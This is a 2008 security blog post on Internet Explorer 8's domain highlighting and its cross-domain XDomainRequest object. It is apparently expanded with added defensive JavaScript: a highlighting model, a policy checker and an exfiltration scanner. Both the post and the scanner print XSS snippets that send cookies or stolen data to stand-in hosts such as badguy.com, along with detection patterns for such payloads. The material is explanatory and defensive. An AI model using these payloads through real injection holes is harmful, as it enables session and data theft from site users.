Internet Explorer 8 - Security Features and Concerns
03.07.2008 - 5:20 PM
One new security feature is domain highlighting:
Screenshot of domain highlighting:
Phishing sites often use naming techniques such as the one shown in the screenshot. This often confuses users into thinking that they have reached a legitimate Web site, because the domain name they are trying to visit is within the URL. This new highlighting technique will help to thwart such attempts once users upgrade and are aware of this new protection. Firefox users can achieve the same effect by installing the Location^2 plugin.
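To make the highlighting idea concrete, here is an added example (not code from the original post or from any browser vendor) that models what domain highlighting does: it splits a URL into the parts the address bar de-emphasises and the registrable domain it highlights. The lure URL is constructed for the demonstration, the Node.js URL class is assumed, and the public-suffix table is a tiny hand-written subset rather than the real Public Suffix List.

```javascript
// Added example: a simplified model of address-bar domain highlighting.
// Assumptions: Node.js (global URL class); MULTI_LABEL_SUFFIXES is a
// hand-written subset standing in for the real Public Suffix List.
const MULTI_LABEL_SUFFIXES = new Set(["co.uk", "org.uk", "com.au", "co.jp"]);

// Return the registrable domain, i.e. the part a browser would highlight.
function registrableDomain(hostname) {
  const host = hostname.toLowerCase();
  if (/^\d+\.\d+\.\d+\.\d+$/.test(host)) return host; // bare IPv4: nothing to split
  const labels = host.split(".");
  if (labels.length < 2) return host;                // e.g. "localhost"
  const lastTwo = labels.slice(-2).join(".");
  const take = MULTI_LABEL_SUFFIXES.has(lastTwo) ? 3 : 2;
  return labels.slice(-take).join(".");
}

// Split a URL into de-emphasised parts and the highlighted domain.
function splitForHighlight(urlString) {
  const u = new URL(urlString);
  const host = u.hostname;
  const domain = registrableDomain(host);
  return {
    scheme: u.protocol,                                 // "http:" or "https:"
    userinfo: u.username
      ? `${u.username}${u.password ? ":" + u.password : ""}@`
      : "",
    subdomains: host.slice(0, host.length - domain.length), // leading labels + dot
    domain,
    port: u.port ? ":" + u.port : "",
    rest: u.pathname + u.search + u.hash,
  };
}

// Plain-text rendering: the highlighted domain is wrapped in brackets.
function renderHighlighted(urlString) {
  const p = splitForHighlight(urlString);
  return `${p.scheme}//${p.userinfo}${p.subdomains}[${p.domain}]${p.port}${p.rest}`;
}

// Constructed lure of the kind the post describes: the brand name sits in the
// host, but the registrable domain is something else entirely.
const LURE = "http://www.paypal.com.account-verify.example/cgi-bin/webscr";
console.log(renderHighlighted(LURE));
// http://www.paypal.com.[account-verify.example]/cgi-bin/webscr
```

The useful property is that the brackets land on the only part of the host the page's owner actually controls; everything to the left of it is chosen freely by whoever registered that domain.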
Cross Domain Requests
Under the same origin policy, a page that needs data from another site typically has to go through a server-side proxy that makes the request on its behalf. These restrictions were created in an attempt to prevent unauthorized communication with external entities such as malicious Web sites. The typical flow of such a request can be seen below:
Internet Explorer 8 breaks the boundaries of the same origin policy by adding the capability to make cross-domain requests with the new XDR object. The restrictions on this type of communication are shown here:
A couple of other interesting restrictions are:
- The protocols of each site must match (you cannot communicate between https:// and http://, and vice-versa).
- The requested page must return the XDomainRequestAllowed header with a value of 1.
Additional technical details and examples can be found here.
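The two restrictions above can be modelled as a policy check on the target's response. The following is an added example, not Microsoft's code, and it models only the two rules the post lists (matching protocols, and an opt-in header with value 1); any other IE8 behaviour is out of scope. The second function stands in for a site deciding which of its own resources to opt in, and the endpoint paths are constructed for the demonstration. Only the Node.js URL class is assumed.

```javascript
// Added example: the two XDR restrictions from the post, evaluated the way the
// browser evaluates them, i.e. against the response headers of the target.
function checkXdrPolicy(pageUrl, targetUrl, responseHeaders) {
  const page = new URL(pageUrl);
  const target = new URL(targetUrl);

  // Rule 1: protocols must match (no mixing of http:// and https://).
  if (page.protocol !== target.protocol) {
    return {
      allowed: false,
      reason: `protocol mismatch: page is ${page.protocol}, target is ${target.protocol}`,
    };
  }

  // Rule 2: the response must carry XDomainRequestAllowed: 1.
  // Header names are case-insensitive, so normalise before the lookup.
  const headers = {};
  for (const [name, value] of Object.entries(responseHeaders)) {
    headers[name.toLowerCase()] = String(value).trim();
  }
  const flag = headers["xdomainrequestallowed"];
  if (flag === undefined) {
    return { allowed: false, reason: "target did not opt in (header absent)" };
  }
  if (flag !== "1") {
    return { allowed: false, reason: `target sent XDomainRequestAllowed: ${flag}, expected 1` };
  }
  return { allowed: true, reason: "protocols match and target opted in" };
}

// Server side (constructed site): the header is a plain flag, not a list of
// permitted origins, so every site can read whatever carries it. Opt in only
// resources that are public and carry no per-user data.
function responseHeadersFor(path) {
  const headers = { "Content-Type": "application/json" };
  if (path.startsWith("/public/")) {
    headers["XDomainRequestAllowed"] = "1"; // public feed: fine to expose
  }
  return headers; // anything under /account/ never gets the header
}

console.log(checkXdrPolicy("http://app.example/", "http://data.example/public/feed.json",
  responseHeadersFor("/public/feed.json")));
console.log(checkXdrPolicy("http://app.example/", "http://data.example/account/balance",
  responseHeadersFor("/account/balance")));
console.log(checkXdrPolicy("https://app.example/", "http://data.example/public/feed.json",
  responseHeadersFor("/public/feed.json")));
```

The point of the second function is that, with a flag-style header, the only control a site has over who reads a resource is whether the header is sent at all, so the decision belongs with the resource, not in a global response filter.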
Security Concerns
Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:
<img src="http://badguy.com/steal.php?cookie=" + cookie />
The <img> tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:
var xdr = new XDomainRequest();
xdr.open("POST", "http://www.badguy.com/");
xdr.send(stolenInfo);
With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these.
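On the defender's side, the injection scenario above has two answers: keep injected markup inert through output encoding, and watch stored content for payloads that ship data out. The following is an added example, not code from the original post. escapeHtml() is the encoding step applied to untrusted input before it is written into a page; findExfiltrationIndicators() is a coarse scanner that a reviewer can run over stored user content or a proxy log to flag the two exfiltration shapes the post shows, the <img> beacon and the XDomainRequest POST. The sample payloads and the indicator list are constructed for the demonstration.

```javascript
// Added example: output encoding plus a coarse indicator scan for the
// exfiltration patterns discussed above. Sample inputs are constructed.
function escapeHtml(untrusted) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(untrusted).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed indicator list: each entry names one shape of outbound data flow.
const INDICATORS = [
  { name: "xdr-object",    re: /new\s+XDomainRequest\s*\(/i },
  { name: "cookie-access", re: /document\.cookie/i },
  { name: "img-beacon",    re: /<img[^>]*src\s*=\s*["']?https?:\/\/[^"'>\s]*cookie=/i },
  { name: "external-post", re: /\.open\s*\(\s*["']POST["']\s*,\s*["']https?:\/\//i },
];

// Return one hit per matching indicator with its offset and a short sample.
function findExfiltrationIndicators(content) {
  const hits = [];
  for (const { name, re } of INDICATORS) {
    const m = re.exec(content);
    if (m) hits.push({ indicator: name, offset: m.index, sample: m[0].slice(0, 60) });
  }
  return hits;
}

// Constructed samples: a benign comment and a payload of the shape shown above.
const BENIGN = 'Great post, see http://example.com/ for the announcement.';
const XDR_PAYLOAD =
  'var xdr = new XDomainRequest(); xdr.open("POST", "http://badguy.example/"); ' +
  'xdr.send(document.cookie);';

console.log(escapeHtml('<img src="http://badguy.example/steal.php?cookie=">'));
console.log(findExfiltrationIndicators(BENIGN).length);      // 0
console.log(findExfiltrationIndicators(XDR_PAYLOAD).map((h) => h.indicator));
// [ 'xdr-object', 'cookie-access', 'external-post' ]
```

The scanner is deliberately simple and will miss obfuscated payloads; its value is as a cheap first pass over content that should never contain script at all, with the encoding step doing the actual prevention.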
Conclusion
The concept of direct, external communication via the XDR object in Microsoft Internet Explorer 8 is nothing new. Similar communication has been achieved through other means, such as img tags, script src includes, iframes, flash files, and so on. It is also important to note that IE8's external communication policy is not unique and actually resembles Flash's; both retrieve policy information from the request host (the XDomainRequestAllowed header and crossdomain.xml respectively). The benefit of direct communication is so large in terms of product development and interactivity that other browsers, such as Firefox, are also implementing cross-domain request capabilities in their products. Security is always at odds with functionality, leading to tradeoffs without a clear solution.
Security Researcher: Joren McReynolds